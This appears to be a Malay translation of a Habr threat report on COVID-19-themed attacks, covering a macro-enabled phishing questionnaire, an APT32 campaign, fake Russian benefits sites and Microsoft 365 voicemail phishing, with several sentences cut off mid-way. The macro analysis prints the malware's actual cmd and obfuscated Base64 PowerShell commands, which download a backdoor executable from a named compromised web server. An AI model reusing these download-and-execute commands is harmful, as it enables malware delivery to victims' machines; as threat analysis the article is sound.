Penyerang terus mengeksploitasi topik COVID-19, mewujudkan lebih banyak ancaman bagi pengguna yang sangat berminat dengan semua perkara yang berkaitan dengan wabak itu. DALAM
Ingat dalam
Adakah anda mahukan ujian percuma untuk COVID-19?
Satu lagi contoh pancingan data bertema coronavirus yang ketara ialah
Meyakinkan kebanyakan pengguna untuk mendayakan makro juga mudah. Untuk melakukan ini, helah standard telah digunakan: untuk mengisi soal selidik, anda perlu mendayakan makro terlebih dahulu, yang bermaksud anda perlu menjalankan skrip VBA.
Seperti yang anda lihat, skrip VBA disembunyikan khas daripada antivirus.
Windows mempunyai ciri tunggu di mana aplikasi menunggu /T <saat> sebelum menerima jawapan lalai "Ya". Dalam kes kami, skrip menunggu 65 saat sebelum memadamkan fail sementara:
cmd.exe /C choice /C Y /N /D Y /T 65 & Del C:UsersPublictmpdirtmps1.bat & del C:UsersPublic1.txt
Dan sementara menunggu, perisian hasad telah dimuat turun. Skrip PowerShell khas telah dilancarkan untuk ini:
cmd /C powershell -Command ""(New-Object Net.WebClient).DownloadFile([System.Text.Encoding]::ASCII.GetString([System.Convert]: :FromBase64String('aHR0cDovL2F1dG9tYXRpc2NoZXItc3RhdWJzYXVnZXIuY29tL2ZlYXR1cmUvNzc3Nzc3LnBuZw==')), [System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('QzpcVXNlcnNcUHVibGljXHRtcGRpclxmaWxl')) + '1' + '.e' + 'x' + 'e') >C:UsersPublic1.txt
Selepas menyahkod nilai Base64, skrip PowerShell memuat turun pintu belakang yang terletak pada pelayan web yang digodam sebelum ini dari Jerman:
http://automatischer-staubsauger.com/feature/777777.png
dan menyimpannya di bawah nama:
C:UsersPublictmpdirfile1.exe
Folder βC:UsersPublictmpdirβ
dipadamkan apabila menjalankan fail 'tmps1.bat' yang mengandungi arahan cmd /c mkdir ""C:UsersPublictmpdir"".
Serangan yang disasarkan ke atas agensi kerajaan
Selain itu, penganalisis FireEye baru-baru ini melaporkan serangan APT32 yang disasarkan yang ditujukan kepada struktur kerajaan di Wuhan, serta Kementerian Pengurusan Kecemasan China. Salah satu RTF yang diedarkan mengandungi pautan ke artikel New York Times bertajuk
Menariknya, pada masa pengesanan, tiada antivirus yang mengesan kejadian ini, menurut Virustotal.
Apabila laman web rasmi tidak berfungsi
Contoh paling ketara serangan pancingan data berlaku di Rusia pada hari yang lain. Sebabnya adalah pelantikan faedah yang ditunggu-tunggu untuk kanak-kanak berumur 3 hingga 16 tahun. Apabila permulaan penerimaan permohonan diumumkan pada 12 Mei 2020, berjuta-juta bergegas ke tapak web Perkhidmatan Negeri untuk mendapatkan bantuan yang telah lama ditunggu-tunggu dan menurunkan portal itu tidak lebih teruk daripada serangan DDoS profesional. Apabila presiden berkata bahawa "Perkhidmatan Kerajaan tidak dapat menampung aliran permohonan," orang ramai mula bercakap dalam talian tentang pelancaran tapak alternatif untuk menerima permohonan.
Masalahnya ialah beberapa tapak mula berfungsi serentak, dan sementara satu, yang sebenar di posobie16.gosuslugi.ru, sebenarnya menerima permohonan, lebih
Rakan sekerja dari SearchInform menemui kira-kira 30 domain penipuan baharu dalam zon .ru. Syarikat Infosecurity dan Softline telah menjejaki lebih 70 tapak web perkhidmatan kerajaan palsu yang serupa sejak awal April. Pencipta mereka memanipulasi simbol biasa dan juga menggunakan gabungan perkataan gosuslugi, gosuslugi-16, vyplaty, covid-vyplaty, posobie dan sebagainya.
Hype dan kejuruteraan sosial
Semua contoh ini hanya mengesahkan bahawa penyerang berjaya mengewangkan topik coronavirus. Dan semakin tinggi ketegangan sosial dan semakin banyak isu yang tidak jelas, semakin banyak peluang penipu untuk mencuri data penting, memaksa orang ramai melepaskan wang mereka sendiri atau hanya menggodam lebih banyak komputer.
Dan memandangkan wabak itu telah memaksa orang yang berpotensi tidak bersedia untuk bekerja dari rumah secara beramai-ramai, bukan sahaja peribadi, tetapi juga data korporat berisiko. Sebagai contoh, baru-baru ini pengguna Microsoft 365 (dahulunya Office 365) turut mengalami serangan pancingan data. Orang ramai menerima mesej suara "rindu" besar-besaran sebagai lampiran pada surat. Walau bagaimanapun, fail tersebut sebenarnya adalah halaman HTML yang menghantar mangsa serangan ke
Sumber: www.habr.com